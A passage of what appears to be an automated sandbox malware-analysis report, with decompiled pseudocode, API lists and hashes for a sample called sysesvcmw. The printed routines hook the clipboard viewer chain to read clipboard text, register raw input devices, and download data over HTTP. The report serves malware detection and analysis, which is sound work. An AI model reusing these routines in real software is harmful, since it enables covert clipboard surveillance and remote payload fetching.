                                                                                                                                                                                                                                                                                    						_v34 = 6;
                                                                                                                                                                                                                                                                                    						_v32 = 1;
                                                                                                                                                                                                                                                                                    						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                                                                                                                                                                                                                    						ChangeClipboardChain(_a4, _v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L38;
                                                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                                                    0x004041b2
                                                                                                                                                                                                                                                                                    0x004041b8
                                                                                                                                                                                                                                                                                    0x004041c2
                                                                                                                                                                                                                                                                                    0x004041ed
                                                                                                                                                                                                                                                                                    0x0040421c
                                                                                                                                                                                                                                                                                    0x0040423a
                                                                                                                                                                                                                                                                                    0x0040424c
                                                                                                                                                                                                                                                                                    0x0040424c
                                                                                                                                                                                                                                                                                    0x0040421e
                                                                                                                                                                                                                                                                                    0x00404221
                                                                                                                                                                                                                                                                                    0x0040422e
                                                                                                                                                                                                                                                                                    0x0040422e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004041ef
                                                                                                                                                                                                                                                                                    0x004043d4
                                                                                                                                                                                                                                                                                    0x004043ed
                                                                                                                                                                                                                                                                                    0x004043ed
                                                                                                                                                                                                                                                                                    0x004041ed
                                                                                                                                                                                                                                                                                    0x004041cb
                                                                                                                                                                                                                                                                                    0x00404257
                                                                                                                                                                                                                                                                                    0x00404268
                                                                                                                                                                                                                                                                                    0x0040427d
                                                                                                                                                                                                                                                                                    0x00404292
                                                                                                                                                                                                                                                                                    0x00404294
                                                                                                                                                                                                                                                                                    0x00404294
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                                                                    0x0040436f
                                                                                                                                                                                                                                                                                    0x00404373
                                                                                                                                                                                                                                                                                    0x00404385
                                                                                                                                                                                                                                                                                    0x00404385
                                                                                                                                                                                                                                                                                    0x004042b5
                                                                                                                                                                                                                                                                                    0x004042bf
                                                                                                                                                                                                                                                                                    0x004042c6
                                                                                                                                                                                                                                                                                    0x004042d7
                                                                                                                                                                                                                                                                                    0x004042de
                                                                                                                                                                                                                                                                                    0x004042e5
                                                                                                                                                                                                                                                                                    0x004042ef
                                                                                                                                                                                                                                                                                    0x004042f6
                                                                                                                                                                                                                                                                                    0x00404321
                                                                                                                                                                                                                                                                                    0x00404326
                                                                                                                                                                                                                                                                                    0x00404329
                                                                                                                                                                                                                                                                                    0x004042f8
                                                                                                                                                                                                                                                                                    0x004042fc
                                                                                                                                                                                                                                                                                    0x00404336
                                                                                                                                                                                                                                                                                    0x0040433b
                                                                                                                                                                                                                                                                                    0x0040433e
                                                                                                                                                                                                                                                                                    0x004042fe
                                                                                                                                                                                                                                                                                    0x00404302
                                                                                                                                                                                                                                                                                    0x0040430c
                                                                                                                                                                                                                                                                                    0x00404311
                                                                                                                                                                                                                                                                                    0x00404314
                                                                                                                                                                                                                                                                                    0x00404314
                                                                                                                                                                                                                                                                                    0x00404302
                                                                                                                                                                                                                                                                                    0x004042fc
                                                                                                                                                                                                                                                                                    0x00404345
                                                                                                                                                                                                                                                                                    0x0040434b
                                                                                                                                                                                                                                                                                    0x00404355
                                                                                                                                                                                                                                                                                    0x0040435b
                                                                                                                                                                                                                                                                                    0x00404367
                                                                                                                                                                                                                                                                                    0x0040436c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404355
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004042e0
                                                                                                                                                                                                                                                                                    0x004042c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                                                                    0x004041d5
                                                                                                                                                                                                                                                                                    0x004041fe
                                                                                                                                                                                                                                                                                    0x0040420b
                                                                                                                                                                                                                                                                                    0x004041d7
                                                                                                                                                                                                                                                                                    0x004041db
                                                                                                                                                                                                                                                                                    0x0040438f
                                                                                                                                                                                                                                                                                    0x00404395
                                                                                                                                                                                                                                                                                    0x00404398
                                                                                                                                                                                                                                                                                    0x0040439b
                                                                                                                                                                                                                                                                                    0x004043a4
                                                                                                                                                                                                                                                                                    0x004043ad
                                                                                                                                                                                                                                                                                    0x004043b1
                                                                                                                                                                                                                                                                                    0x004043c0
                                                                                                                                                                                                                                                                                    0x004043ce
                                                                                                                                                                                                                                                                                    0x004043ce
                                                                                                                                                                                                                                                                                    0x004041db
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004041AC
                                                                                                                                                                                                                                                                                    • SetClipboardViewer.USER32 ref: 004041F8
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32 ref: 0040420B
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00404260
                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004042A7
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32 ref: 004042B9
                                                                                                                                                                                                                                                                                    • RegisterRawInputDevices.USER32 ref: 004043C0
                                                                                                                                                                                                                                                                                    • ChangeClipboardChain.USER32 ref: 004043CE
                                                                                                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 004043E4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d6eb097551fe403484d6df1eea500d8dda5268cf33ca3084c7f7c11ec5fa5c98
                                                                                                                                                                                                                                                                                    • Instruction ID: 12af2944b2afbdd2840b1e0cc58b104c1e1997fab1ca1becb874473cf393234d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6eb097551fe403484d6df1eea500d8dda5268cf33ca3084c7f7c11ec5fa5c98
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 927111B4A00208EFDF14DF94D948BEE77B4AF88305F14856AFA05B72D0D7799A40CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                    			E0040E0E0(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                                                    				long _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				LONG* _t62;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t53 = __edi;
                                                                                                                                                                                                                                                                                    				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t1 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t1);
                                                                                                                                                                                                                                                                                    					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                                                    						_t13 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t13);
                                                                                                                                                                                                                                                                                    						SetEvent( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                                    						_t56 = 0;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							E0040BC90( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                                                                                                                                                                                                                    							E0040BDD0( *((intOrPtr*)(_t53 + 0xc)));
                                                                                                                                                                                                                                                                                    							CloseHandle( *(_t53 + 8));
                                                                                                                                                                                                                                                                                    							CloseHandle( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                                    							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                                                                                                                                                                                                                    							E00409600( *((intOrPtr*)(_t53 + 0x14)));
                                                                                                                                                                                                                                                                                    							_t24 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    							DeleteCriticalSection(_t24);
                                                                                                                                                                                                                                                                                    							return E00408C70(_t53);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                                                                                                                                                                                                                    							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                                    						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                                                                    						if( *_t55 == 0x69636c69) {
                                                                                                                                                                                                                                                                                    							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                                    								_t62 = _t55 + 0x21c;
                                                                                                                                                                                                                                                                                    								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                                                                                                                                                                                                                    								if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    									 *(_t55 + 0x230) = _t40;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                                                                                                                                                                                                                    									InterlockedIncrement(_t62);
                                                                                                                                                                                                                                                                                    									if(E0040E730(_t55) == 0) {
                                                                                                                                                                                                                                                                                    										InterlockedDecrement(_t62);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                                                                                                                                                                                                                    					} while (_t55 != 0);
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x0040e0e0
                                                                                                                                                                                                                                                                                    0x0040e0e2
                                                                                                                                                                                                                                                                                    0x0040e217
                                                                                                                                                                                                                                                                                    0x0040e0f4
                                                                                                                                                                                                                                                                                    0x0040e0f6
                                                                                                                                                                                                                                                                                    0x0040e0fa
                                                                                                                                                                                                                                                                                    0x0040e100
                                                                                                                                                                                                                                                                                    0x0040e105
                                                                                                                                                                                                                                                                                    0x0040e190
                                                                                                                                                                                                                                                                                    0x0040e190
                                                                                                                                                                                                                                                                                    0x0040e194
                                                                                                                                                                                                                                                                                    0x0040e19e
                                                                                                                                                                                                                                                                                    0x0040e1a4
                                                                                                                                                                                                                                                                                    0x0040e1a9
                                                                                                                                                                                                                                                                                    0x0040e1c3
                                                                                                                                                                                                                                                                                    0x0040e1c9
                                                                                                                                                                                                                                                                                    0x0040e1d2
                                                                                                                                                                                                                                                                                    0x0040e1e4
                                                                                                                                                                                                                                                                                    0x0040e1ea
                                                                                                                                                                                                                                                                                    0x0040e1f0
                                                                                                                                                                                                                                                                                    0x0040e1fa
                                                                                                                                                                                                                                                                                    0x0040e202
                                                                                                                                                                                                                                                                                    0x0040e206
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e216
                                                                                                                                                                                                                                                                                    0x0040e1b1
                                                                                                                                                                                                                                                                                    0x0040e1bb
                                                                                                                                                                                                                                                                                    0x0040e1bd
                                                                                                                                                                                                                                                                                    0x0040e1be
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e10b
                                                                                                                                                                                                                                                                                    0x0040e10b
                                                                                                                                                                                                                                                                                    0x0040e111
                                                                                                                                                                                                                                                                                    0x0040e133
                                                                                                                                                                                                                                                                                    0x0040e137
                                                                                                                                                                                                                                                                                    0x0040e13e
                                                                                                                                                                                                                                                                                    0x0040e146
                                                                                                                                                                                                                                                                                    0x0040e14c
                                                                                                                                                                                                                                                                                    0x0040e152
                                                                                                                                                                                                                                                                                    0x0040e15c
                                                                                                                                                                                                                                                                                    0x0040e162
                                                                                                                                                                                                                                                                                    0x0040e16c
                                                                                                                                                                                                                                                                                    0x0040e179
                                                                                                                                                                                                                                                                                    0x0040e17c
                                                                                                                                                                                                                                                                                    0x0040e17c
                                                                                                                                                                                                                                                                                    0x0040e179
                                                                                                                                                                                                                                                                                    0x0040e146
                                                                                                                                                                                                                                                                                    0x0040e133
                                                                                                                                                                                                                                                                                    0x0040e182
                                                                                                                                                                                                                                                                                    0x0040e188
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e10b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000020,0040B950,?,0040EC84), ref: 0040E0FA
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E126
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E13E
                                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0040E16C
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E17C
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000020,?,0040EC84), ref: 0040E194
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0040EC84), ref: 0040E19E
                                                                                                                                                                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040EC84), ref: 0040E1BB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E1E4
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E1EA
                                                                                                                                                                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 0040E1F0
                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040EC84), ref: 0040E206
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                                                                                                                                                                    • Opcode ID: 24bc7e855fdf49573c30e595b41f6c55b623b0266ed7625da85c1981aca9c43c
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e090b2b2d95b5b5db58c8e8021d4e4c0217c2d5e17fa086addfc70fe82b675d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24bc7e855fdf49573c30e595b41f6c55b623b0266ed7625da85c1981aca9c43c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E319871500705BBD7109F71EC48F97B7A8BF09300F048A2EE959A7691C778F9A4CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E004043F0() {
                                                                                                                                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                                                                                                    				struct _WNDCLASSEXW _v84;
                                                                                                                                                                                                                                                                                    				short _v596;
                                                                                                                                                                                                                                                                                    				unsigned int _t20;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_v84.cbSize = 0;
                                                                                                                                                                                                                                                                                    					memset( &(_v84.style), 0, 0x2c);
                                                                                                                                                                                                                                                                                    					_t40 = _t39 + 0xc;
                                                                                                                                                                                                                                                                                    					_v84.cbSize = 0x30;
                                                                                                                                                                                                                                                                                    					_v84.lpfnWndProc = E004041A0;
                                                                                                                                                                                                                                                                                    					_v84.hInstance = GetModuleHandleW(0);
                                                                                                                                                                                                                                                                                    					_v84.lpszClassName =  &_v596;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						Sleep(1);
                                                                                                                                                                                                                                                                                    						_t20 = GetTickCount();
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                                                                                                                                                                                                                    						_t40 = _t40 + 0x10;
                                                                                                                                                                                                                                                                                    					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                                                                                                                                                                                                                    					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                                                                                                                                                                                                                    							TranslateMessage( &_v36);
                                                                                                                                                                                                                                                                                    							DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    				} while (0 != 0);
                                                                                                                                                                                                                                                                                    				ExitThread(0);
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x004043f9
                                                                                                                                                                                                                                                                                    0x004043f9
                                                                                                                                                                                                                                                                                    0x00404408
                                                                                                                                                                                                                                                                                    0x0040440d
                                                                                                                                                                                                                                                                                    0x00404410
                                                                                                                                                                                                                                                                                    0x00404417
                                                                                                                                                                                                                                                                                    0x00404426
                                                                                                                                                                                                                                                                                    0x0040442f
                                                                                                                                                                                                                                                                                    0x00404432
                                                                                                                                                                                                                                                                                    0x00404434
                                                                                                                                                                                                                                                                                    0x0040443a
                                                                                                                                                                                                                                                                                    0x00404456
                                                                                                                                                                                                                                                                                    0x0040445c
                                                                                                                                                                                                                                                                                    0x0040446c
                                                                                                                                                                                                                                                                                    0x00404492
                                                                                                                                                                                                                                                                                    0x00404499
                                                                                                                                                                                                                                                                                    0x0040449d
                                                                                                                                                                                                                                                                                    0x004044b5
                                                                                                                                                                                                                                                                                    0x004044bf
                                                                                                                                                                                                                                                                                    0x004044bf
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040449d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004044c7
                                                                                                                                                                                                                                                                                    0x004044c7
                                                                                                                                                                                                                                                                                    0x004044d1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                                                    • String ID: %x%X$0
                                                                                                                                                                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                                                    • Opcode ID: fefae300a6ae166907af6779e4e4d81ad735c504abc0138177021c7cc3709374
                                                                                                                                                                                                                                                                                    • Instruction ID: 3e2b717ade092063a9efcdadcacb4b05de8fa546afe9c034d67f52ff400308d4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fefae300a6ae166907af6779e4e4d81ad735c504abc0138177021c7cc3709374
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 732121B0940318ABEB109BE0DC4DFEE7B78BB48701F548529F601B61D0DBB995448B69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 564 40c260-40c2fb memset InternetCrackUrlA InternetOpenA 565 40c301-40c334 InternetConnectA 564->565 566 40c477-40c480 564->566 567 40c46a-40c471 InternetCloseHandle 565->567 568 40c33a-40c36a HttpOpenRequestA 565->568 567->566 569 40c370-40c387 HttpSendRequestA 568->569 570 40c45d-40c464 InternetCloseHandle 568->570 571 40c450-40c457 InternetCloseHandle 569->571 572 40c38d-40c391 569->572 570->567 571->570 573 40c446 572->573 574 40c397 572->574 573->571 575 40c3a1-40c3a8 574->575 576 40c439-40c444 575->576 577 40c3ae-40c3d0 InternetReadFile 575->577 576->571 578 40c3d2-40c3d9 577->578 579 40c3db 577->579 578->579 580 40c3dd-40c434 call 408b60 memcpy 578->580 579->576 580->575
                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040C260(char* _a4, char** _a8) {
                                                                                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                                                                                    				char _v772;
                                                                                                                                                                                                                                                                                    				long _v776;
                                                                                                                                                                                                                                                                                    				void* _v780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v792;
                                                                                                                                                                                                                                                                                    				char* _v796;
                                                                                                                                                                                                                                                                                    				signed short _v816;
                                                                                                                                                                                                                                                                                    				intOrPtr _v820;
                                                                                                                                                                                                                                                                                    				char* _v824;
                                                                                                                                                                                                                                                                                    				void _v836;
                                                                                                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                                                                                                    				void* _v844;
                                                                                                                                                                                                                                                                                    				void* _v848;
                                                                                                                                                                                                                                                                                    				char* _v852;
                                                                                                                                                                                                                                                                                    				void _v1876;
                                                                                                                                                                                                                                                                                    				long _v1880;
                                                                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v776 = 0;
                                                                                                                                                                                                                                                                                    				_v840 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                                    				_t92 = _t91 + 0xc;
                                                                                                                                                                                                                                                                                    				_v840 = 0x3c;
                                                                                                                                                                                                                                                                                    				_v824 =  &_v260;
                                                                                                                                                                                                                                                                                    				_v820 = 0x100;
                                                                                                                                                                                                                                                                                    				_v796 =  &_v772;
                                                                                                                                                                                                                                                                                    				_v792 = 0x200;
                                                                                                                                                                                                                                                                                    				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                                    				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v780 != 0) {
                                                                                                                                                                                                                                                                                    					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v844 != 0) {
                                                                                                                                                                                                                                                                                    						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v848 != 0) {
                                                                                                                                                                                                                                                                                    							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                                                                                                                    								if(_a8 == 0) {
                                                                                                                                                                                                                                                                                    									_v776 = 1;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v852 = 0;
                                                                                                                                                                                                                                                                                    									while(1 != 0) {
                                                                                                                                                                                                                                                                                    										_t87 = _v848;
                                                                                                                                                                                                                                                                                    										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                                                                                                                                                                                                                    											_v776 = E00408B60(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                                                                                                                                                                                                                    											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                                                                                                                                                                                                                    											_t92 = _t92 + 0x14;
                                                                                                                                                                                                                                                                                    											_v852 =  &(_v852[_v1880]);
                                                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									 *_a8 = _v852;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v776;
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x0040c269
                                                                                                                                                                                                                                                                                    0x0040c273
                                                                                                                                                                                                                                                                                    0x0040c288
                                                                                                                                                                                                                                                                                    0x0040c28d
                                                                                                                                                                                                                                                                                    0x0040c290
                                                                                                                                                                                                                                                                                    0x0040c2a0
                                                                                                                                                                                                                                                                                    0x0040c2a6
                                                                                                                                                                                                                                                                                    0x0040c2b6
                                                                                                                                                                                                                                                                                    0x0040c2bc
                                                                                                                                                                                                                                                                                    0x0040c2d8
                                                                                                                                                                                                                                                                                    0x0040c2ee
                                                                                                                                                                                                                                                                                    0x0040c2fb
                                                                                                                                                                                                                                                                                    0x0040c327
                                                                                                                                                                                                                                                                                    0x0040c334
                                                                                                                                                                                                                                                                                    0x0040c35d
                                                                                                                                                                                                                                                                                    0x0040c36a
                                                                                                                                                                                                                                                                                    0x0040c387
                                                                                                                                                                                                                                                                                    0x0040c391
                                                                                                                                                                                                                                                                                    0x0040c446
                                                                                                                                                                                                                                                                                    0x0040c397
                                                                                                                                                                                                                                                                                    0x0040c397
                                                                                                                                                                                                                                                                                    0x0040c3a1
